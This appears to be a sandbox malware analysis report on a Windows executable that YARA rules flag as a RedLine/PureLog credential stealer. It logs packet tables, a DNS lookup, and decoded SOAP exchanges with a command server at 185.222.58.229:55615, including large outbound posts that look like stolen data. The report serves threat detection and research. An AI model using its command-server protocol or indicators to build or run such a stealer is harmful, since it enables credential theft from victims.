Dec 3, 2024 13:27:17.199796915 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199804068 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199902058 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199908972 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199963093 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.199970007 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.200053930 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.200117111 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.200170040 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.200215101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.305969954 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.305980921 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.305999994 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306008101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306052923 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306083918 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306134939 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306152105 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306252956 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306261063 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306329012 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306348085 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306406021 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306458950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306519985 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306528091 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306570053 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306617975 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306663990 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306708097 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306821108 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306843996 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306936026 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.306945086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307003021 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307010889 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307070017 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307077885 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307126045 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307133913 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307251930 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307259083 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307295084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307378054 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307429075 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307472944 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307518959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307540894 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307656050 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307663918 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307760954 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307770014 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307809114 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307816982 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307929039 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307940006 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307991028 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.307998896 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308020115 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308079004 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308177948 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308185101 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308218002 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308254957 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308341026 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308391094 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308454037 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308470964 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308581114 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308588982 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308640003 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308657885 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308743000 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308779001 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308821917 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308878899 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308945894 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.308953047 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309041977 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309122086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309129953 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309138060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309206963 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309214115 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309293985 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309309959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309420109 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309427977 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309506893 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309514999 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309606075 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309614897 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309694052 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309701920 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309753895 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309794903 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309850931 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309858084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309931040 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.309979916 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310053110 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310069084 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310220957 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310229063 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310256004 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310292959 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310375929 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310384035 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310419083 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310468912 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310549021 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310597897 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310652018 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310658932 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310703039 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310719013 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310817957 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310825109 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310875893 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310924053 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.310956001 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311017036 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311058998 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311110973 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311191082 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311208010 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311319113 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311326981 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311395884 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311405897 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311433077 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311467886 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311528921 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311537027 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311610937 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311626911 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311676979 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311724901 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311749935 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311800003 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311912060 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.311928034 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312014103 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312022924 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312102079 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312109947 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312191010 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312212944 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312254906 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312335968 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312392950 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312401056 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312505960 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312514067 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312596083 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312602997 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312671900 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312679052 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312733889 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312773943 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312808037 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312839985 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312903881 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312911034 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312977076 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.312984943 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313038111 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313090086 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313142061 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313149929 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313239098 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313246965 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313302040 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313311100 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313352108 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313395023 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313446999 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313493013 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313538074 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313546896 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313600063 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313607931 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313652992 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313709974 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313741922 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.313756943 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:17.360336065 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:18.446234941 CET	55615	49739	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:18.460504055 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:18.460679054 CET	49739	55615	192.168.2.4	185.222.58.229

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 13:27:08.543858051 CET	51566	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 13:27:08.543858051 CET	192.168.2.4	1.1.1.1	0x2d86	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 13:27:09.068423033 CET	1.1.1.1	192.168.2.4	0x2d86	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.58.229:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	185.222.58.229	55615	3808	C:\Users\user\Desktop\lWnSA7IyVc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 13:27:00.911386967 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.229:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 3, 2024 13:27:02.182149887 CET	25	IN	HTTP/1.1 100 Continue
Dec 3, 2024 13:27:02.425539017 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 03 Dec 2024 12:27:01 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Dec 3, 2024 13:27:07.551135063 CET	224	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.229:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 3, 2024 13:27:07.951133013 CET	25	IN	HTTP/1.1 100 Continue
Dec 3, 2024 13:27:08.330627918 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 8386 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 03 Dec 2024 12:27:08 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>113.90.86.3</b:string><b:string>103.116.72.6</b:string><b:string>14.156.228.31</b:string><b:string>14.156.228.31</b:string><b:string>115.197.171.138</b:string><b:string>124.236.146.114</b:string><b:string>120.235.72.180</b:string><b:string>125.38.179.154</b:string><b:string>123.131.71.177</b:string><b:string>119.139.137.75</b:string><b:string>14.156.228.31</b:string><b:string>106.113.69.63</b:string><b:string>220.180.154.14</b:string><b:string>139.186.206.86</b:string><b:string>115.213.227.217</b:string><b:string>120.41.179.186</b:string><b:string>219.146.127.99</b:string><b:string>106.114.20 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	185.222.58.229	55615	3808	C:\Users\user\Desktop\lWnSA7IyVc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 13:27:12.661587954 CET	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.229:55615 Content-Length: 956493 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 3, 2024 13:27:15.543055058 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 03 Dec 2024 12:27:15 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.222.58.229	55615	3808	C:\Users\user\Desktop\lWnSA7IyVc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 3, 2024 13:27:15.666400909 CET	242	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.229:55615 Content-Length: 956485 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 3, 2024 13:27:18.446234941 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Tue, 03 Dec 2024 12:27:18 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	07:26:56
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\lWnSA7IyVc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lWnSA7IyVc.exe"
Imagebase:	0x180000
File size:	703'488 bytes
MD5 hash:	3726EE297E39481C17EFBE020EF5CFCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1687881526.00000000050E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1685222888.0000000003539000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1685222888.0000000003572000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1684656014.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:26:58
Start date:	03/12/2024
Path:	C:\Users\user\Desktop\lWnSA7IyVc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\lWnSA7IyVc.exe"
Imagebase:	0xe50000
File size:	703'488 bytes
MD5 hash:	3726EE297E39481C17EFBE020EF5CFCC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
